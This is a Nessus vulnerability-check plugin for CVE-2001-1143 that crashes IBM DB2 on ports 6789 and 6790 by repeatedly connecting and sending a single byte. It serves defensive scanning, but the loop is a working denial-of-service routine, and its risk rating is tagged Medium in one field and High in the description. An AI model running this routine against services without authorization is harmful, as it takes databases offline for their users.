#
# This script was written by Michel Arboi <arboi@alussinan.org>, starting 
# from miscflood.nasl
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10871);
 script_bugtraq_id(3010);
 script_version("$Revision: 8098 $");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"risk_factor", value:"Medium");
 script_cve_id("CVE-2001-1143");
 name = "DB2 DOS";
 script_name(name);
 
 desc = "It was possible to crash
the DB2 database by sending just one byte to it.

An attacker  may use this attack to make this
service crash continuously, preventing you
from working properly.


Solution: upgrade your software

Risk factor : High";



 script_description(desc);
 
 summary = "Flood against the remote service";
 script_summary(summary);
 
 script_category(ACT_DENIAL);
 
 script_copyright("This script is Copyright (C) 2002 Michel Arboi");
 family = "Denial of Service";

 script_family(family);
 script_require_ports(6789, 6790);
 exit(0);
}

#

function test_db2_port(port)
{
 if (! get_port_state(port))
  return(0);

 soc = open_sock_tcp(port);
 if (!soc)
  return(0);
 for (i=0; i<100; i=i+1)
 {
  send(socket:soc, data:string("x"));
  close(soc);

  soc = open_sock_tcp(port);
  if (! soc)
  {
   sleep(1);
   soc = open_sock_tcp(port);
   if (! soc)
   {
    security_hole(port);
    return (1);
   }
  }
 }
 close(soc);
 return(1);
}

test_db2_port(port:6789);
test_db2_port(port:6790);

